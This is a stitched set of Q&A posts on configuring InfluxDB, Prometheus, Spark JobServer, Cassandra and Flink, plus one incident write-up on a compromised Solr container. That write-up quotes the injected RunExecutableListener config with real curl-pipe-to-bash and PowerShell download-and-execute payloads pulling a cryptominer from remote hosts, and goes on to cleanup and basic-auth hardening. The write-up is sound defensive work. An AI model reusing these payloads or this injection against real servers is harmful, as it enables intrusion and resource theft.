I've Installed package from the official site by instruction. By default the physical destination of database folder is /opt/influxdb/shared.
I've tried to change properties of config file and written it properly. But after that I can't start the influxdb service.
[storage]
dir = "/media/alex/Second/InfluxStorage/data/db" //my settings
How I can change the default database directory ?
EDIT: This is for InfluxDB v1.x only. It has been reported to not work for InfluxDB v2.x.
Make a new directory where you want to put your data and set the appropriate permissions, e.g.:
mkdir /new/path/to/influxdb
sudo chown influxdb:influxdb influxdb
Edit the following three lines of your /etc/influxdb/influxdb.conf (/usr/local/etc/influxdb.conf on macOS) so that they point to your new location:
# under [meta]
dir = "/new/path/to/influxdb/meta"
# under [data]
dir = "/new/path/to/influxdb/data"
wal-dir = "/new/path/to/influxdb/wal"
Restart the InfluxDB daemon.
sudo service influxdb restart # Ubuntu/Debian
brew services restart influxdb # macOS/homebrew
Done!
In case you want to move existing data, just simply copy the existing data (location can be found at influxdb.conf; /var/lib/influxdb on Ubuntu/Debian) to your new desired location before editing influxdb.conf and make sure the new folder has the appropriate permissions/ownership.
There is some information about backups/restores on the official docs, however just plain copying worked for me.
The above was tested on InfluxDB v1.2 on macOS/Ubuntu/Raspbian.
For InfluxDB 2.0:
In InfluxDB 2.0 the data directories are below ~/.influxdbv2 by default.
Actually, there are 2 data storages for bolt (various key-value configurations) and engine (the TSM database).
From the documentation, to change the location to the bolt database:
Default: ~/.influxdbv2/influxd.bolt
influxd flag: influxd --bolt-path=~/.influxdbv2/influxd.bolt
Environment variable: export INFLUXD_BOLT_PATH=~/.influxdbv2/influxd.bolt
Configuration file: bolt-path: /users/user/.influxdbv2/influxd.bolt
From the documentation, to change the location to the engine database:
Default: ~/.influxdbv2/engine
influxd flag: influxd --engine-path=~/.influxdbv2/engine
Environment variable: export INFLUXD_ENGINE_PATH=~/.influxdbv2/engine
Configuration file: engine-path: /users/user/.influxdbv2/engine
Related
We are trying to substitute the prometheus.yaml in /etc/metrics/conf as it hosts older rules. We try to copy new rules file:
RUN mkdir -p /etc/metrics/conf
COPY conf/prometheus.yaml /etc/metrics/conf/prometheus.yaml
But the rules are not picked up and prometheus still ignores the new metrics.
Sad truth is that in fact the folder and file is alredy there (looks like a symlink to /etc/metrics/conf/..data/prometheus.yaml location).
We had to work it around with
copying files to new location
COPY conf/prometheus.yaml /etc/metrics/conf2/prometheus.yaml
add configFile parameter to the helm chart:
configFile: "/etc/metrics/conf2/prometheus.yaml"
That causes javaagent's properties passed to jmx-exporter to use this new prometheus.yaml location
Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
I am trying to set up a Spark JobServer (SJS) to execute jobs on a Standalone Spark cluster. I am trying to deploy SJS on one of the non-master nodes of SPARK cluster. I am not using the docker, but trying to do manually.
I am confused with the help documents in SJS github particulary the deployment section. Do I need to edit both local.conf and local.sh to run this?
Can someone point out the steps to set up the SJS in the spark cluster?
Thanks!
Kiran
Update:
I created a new environment to deploy jobserver in one of the nodes of the cluster: Here are the details of it:
env1.sh:
DEPLOY_HOSTS="masked.mo.cpy.corp"
APP_USER=kiran
APP_GROUP=spark
INSTALL_DIR=/home/kiran/job-server
LOG_DIR=/var/log/job-server
PIDFILE=spark-jobserver.pid
JOBSERVER_MEMORY=1G
SPARK_VERSION=1.6.1
MAX_DIRECT_MEMORY=512M
SPARK_HOME=/home/spark/spark-1.6.1-bin-hadoop2.6
SPARK_CONF_DIR=$SPARK_HOME/conf
SCALA_VERSION=2.11.6
env1.conf
spark {
master = "local[1]"
webUrlPort = 8080
job-number-cpus = 2
jobserver {
port = 8090
bind-address = "0.0.0.0"
jar-store-rootdir = /tmp/jobserver/jars
context-per-jvm = false
jobdao = spark.jobserver.io.JobFileDAO
filedao {
rootdir = /tmp/spark-job-server/filedao/data
}
datadao {
rootdir = /tmp/spark-jobserver/upload
}
result-chunk-size = 1m
}
context-settings {
num-cpu-cores = 1
memory-per-node = 1G
}
home = "/home/spark/spark-1.6.1-bin-hadoop2.6"
}
Why don't you set JOBSERVER_FG=1 and try running server_start.sh, this would run the process in foreground and should display the error to stderr.
Yes, you have edit both files adapting them for your cluster.
The deploy steps are explained below:
Copy config/local.sh.template to <environment>.sh and edit as appropriate.
This file is mostly for environment variables that are used by the deployment script and by the server_start.sh script. The most important ones are: deploy host (it's the ip or hostname where the jobserver will be run), user and group of execution, JobServer memory (it will be the driver memory), spark version and spark home.
Copy config/shiro.ini.template to shiro.ini and edit as appropriate. NOTE: only required when authentication = on
If you are going to use shiro authentication, then you need this step.
Copy config/local.conf.template to <environment>.conf and edit as appropriate.
This is the main configuration file for JobServer and for the contexts that JobServer will create. The full list of the properties you can set in this file can be seen on this link.
bin/server_deploy.sh <environment>
After editing the configuration files, you can deploy using this script. The parameter must be the name that you chose for your .conf and .sh files.
Once you run the script, JobServer will connect to the host entered in the .sh file and will create a new directory with some control files. Then, every time you need to change a configuration entry, you can do it directly on the remote machine: the .conf file will be there with the name you chose and the .sh file will be renamed to settings.sh.
Please note that, if you haven't configured an SSH key based connection between the machine where you run this script and the remote machine, you will be prompted for password during its execution.
If you have problems with the creation of directories on the remote machine, you can try and create them yourself with mkdir (they must match the INSTALL_DIR configuration entry of the .sh file) and change their owner user and group to match the ones entered in the .sh configuration file.
On the remote server, start it in the deployed directory with server_start.sh and stop it with server_stop.sh
This is very informative. Once you have done all other steps, you can start JobServer service on the remote machine by running the script server_start.sh and you can stop it with server_stop.sh
I'm trying to change the Cassandra data, commit log and saved caches directories by defining a custom shell script for CASANDRA_INCLUDE. I'm modifying the properties in the script as follows :
***
data_file_directories = "/usr/pic1/kearanky/cassandra/data"
commitlog_directory = "/usr/pic1/kearanky/cassandra/commitlog"
saved_caches_directory: "/usr/pic1/kearanky/cassandra/saved_caches"
***
When I run cassandra I get the error "data_file_directories: command not found". How can I modify the directories correctly?
PS: I don't have write access to cassandra.yaml and can't create the default directories it uses.
referrer to this answer Make your own cassandra.yaml with your custom directories and then run cassandra with with -d flag and cassandra.config=directory
or set $CASSANDRA_HOME variable in your .bashrc and then run cassandra
I understand Flink uses log4j to manage log. So I change log setting in log4j.property, where I set the output location. However, when I start job master, it says that the log location is changed, not the default location. So how could I change the log location of Flink gracefully?
The default lib directory is set via bin/config.sh. Look for FLINK_LOG_DIR. You can just update the script to change the default log directory.
Add the following line in flink-conf.yaml that can be found in conf directory of Flink installation:
env.log.dir: /var/log/flink
Where /var/log/flink is the directory you want to use for logs.
Note that Flink does not seem to support full YML syntax, so
env:
log:
dir: /var/log/flink
will not work!
Since 1.0.3 you can set env.log.dir to change the directory where the logs are saved.